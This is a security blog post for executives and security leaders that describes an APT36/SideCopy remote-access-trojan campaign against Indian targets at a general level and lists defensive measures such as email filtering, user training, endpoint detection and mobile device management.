APT36 SideCopy Target India with Cross Platform RAT Campaigns

**APT36 SideCopy Target India with Cross Platform RAT Campaigns**

**Introduction**

Picture this: your organization’s data—sensitive IP, confidential comms, employee credentials—slowly exfiltrated without your team knowing. That’s exactly what’s happening right now in India, where the threat actor APT36, using the SideCopy malware toolkit, has launched a coordinated campaign involving cross-platform Remote Access Trojans (RATs). According to a recent report by The Hacker News (https://thehackernews.com/2026/02/apt36-and-sidecopy-launch-cross.html), this wave of cyberattacks is not only sophisticated but also precisely targeted against Indian defense, government, and strategic sectors.

As a CISO, CEO, or security leader, this isn’t just another alert—it’s a flashing red warning light. APT36 (also known as Transparent Tribe), a suspected Pakistan-based group, has evolved its tactics to deploy Windows and Android malware in the same campaign, enabling deep infiltration across endpoints and user environments.

In this post, we’ll break down what makes this campaign particularly concerning, how it’s structured, and—crucially—what steps you can take to guard your enterprise. You’ll learn:

– How APT36 is blending social engineering and RATs across platforms
– Why the SideCopy framework makes detection harder
– Specific actions you can take today to reduce exposure

Let’s dive in.

**A Blended Threat: Cross-Platform RATs with Precision Targeting**

APT36’s latest offensive isn’t just another phishing campaign laced with malware. The group is employing a multi-pronged strategy that uses customized lures, fileless execution, and Android-based surveillance tools. According to Cyble Research & Intelligence Labs, attackers are deploying a new wave of Remote Access Trojans—primarily Menorah RAT and LimePad—to compromise both Windows and Android endpoints.

What makes these attacks dangerous?

– **Cross-platform reach**: Once the Windows RAT infects a device, it establishes persistence, monitors activity, and enables exfiltration. Meanwhile, the Android variant (distributed as fake government or utility apps) can capture audio, SMS, and contacts—offering a complete view into the victim’s professional and private life.
– **Sophisticated social engineering**: APT36 uses malicious document files disguised as defense-related content (e.g., training reports, military operations files), which builds user trust and increases chances of successful infection.
– **Fileless techniques**: They avoid writing malicious files directly to disk, making detection by traditional antivirus tools considerably more difficult.

These modern APT campaigns don’t need a sophisticated chain of exploits—they rely on exploiting trust and user behavior. The result: a persistent presence within your network that’s hard to detect and potentially catastrophic if left unchecked.

**Why SideCopy Makes Detection So Complicated**

APT36 leverages the SideCopy malware delivery framework, named for its imitation of SideWinder APT tactics. SideCopy is particularly troubling for defenders because it combines familiar tactics with custom modules that are constantly updated to bypass detection.

Here’s why SideCopy elevates this campaign:

– **Layered malware loading**: SideCopy uses staged payloads—initial loaders bring in secondary components based on system context. This modular architecture means even if one part is flagged, the rest can remain dormant or operate unnoticed.
– **Command-and-control (C2) flexibility**: The campaign employs dynamic DNS and multiple layers of fallback infrastructure, making takedown and attribution more difficult.
– **Continual evolution**: Researchers have noted frequent tweaks to payload structures and obfuscation methods. Just as defenders catch up, new variants appear.

One particularly sneaky example in the current campaign involved a benign-looking Excel file that triggered a PowerShell stager executing the Menorah RAT in-memory. This infected system could then be continuously monitored and updated through directives from the C2 server. In nearly all observed cases, the RAT provided attackers the ability to record keystrokes, capture screens, browse files, and perform surveillance undetected.

**How to Defend Against SideCopy RAT Campaigns**

Understanding the threat is only half the battle. The real win lies in proactively defending your infrastructure, devices, and people. Here’s how you can get ahead:

1. **Strengthen email and collaboration defenses**
– Implement attachment and link-scanning with sandboxing.
– Use DMARC, DKIM, and SPF protocols to prevent email spoofing.
– Ban macro-enabled Office files from unverified sources in email gateways.

2. **Educate users regularly**
– Launch phishing simulation exercises.
– Teach staff to recognize lures imitating official government or internal communications.
– Encourage immediate reporting of suspicious content—don’t punish mistakes, reward alerts.

3. **Enhance endpoint detection and response (EDR)**
– Deploy EDR solutions that can monitor process behavior and lateral movement.
– Set baseline activity norms to quickly identify anomalies from dormant agents.
– Cross-reference alerts with threat intelligence feeds, such as emerging SideCopy IOCs.

4. **Secure mobile devices**
– Ban installation of apps from unofficial stores—especially critical in BYOD environments.
– Enforce Mobile Device Management (MDM) with app whitelisting and secure VPN use.
– Monitor usage of file-sharing, SMS, and permissions on Android devices.

5. **Leverage threat intel collaboration**
– Join ISACs (Information Sharing and Analysis Centers) relevant to your sector.
– Share observables like C2 domains and file hashes with peer organizations.

**According to a 2025 Cisco Cybersecurity Readiness Index, 58% of organizations in the Asia-Pacific region reported at least one targeted malware attack involving social engineering last year.** Given the precision of APT36’s tactics, Indian enterprises need to prepare now—not after a breach occurs.

**Conclusion**

APT36’s latest campaign targeting India isn’t just a wake-up call—it’s the alarm clock we can’t hit snooze on. The blending of familiar malware frameworks like SideCopy with cross-platform functionality marks a dangerous evolution in targeted attack strategy. With devices becoming more interconnected, and attackers increasingly adept at subtle footprints, it’s no longer about if they’ll strike, but when—and how well you’re prepared.

We’ve seen how APT36 uses tailored lures, hides behind fileless execution, and targets Windows and Android systems simultaneously. But we’re not powerless. By strengthening awareness, improving detection capabilities, and adopting a zero-trust mindset, we can box out these threats before they take root.

**Now is the time to evaluate your current exposure. Are your users trained? Are your endpoints monitored with behavior-based tools? Is your mobile risk surface accounted for?** If any answer is “not sure,” now’s the time to act.

For deeper insight into the threat campaign, visit the full report at The Hacker News: https://thehackernews.com/2026/02/apt36-and-sidecopy-launch-cross.html

Let’s stay vigilant—together.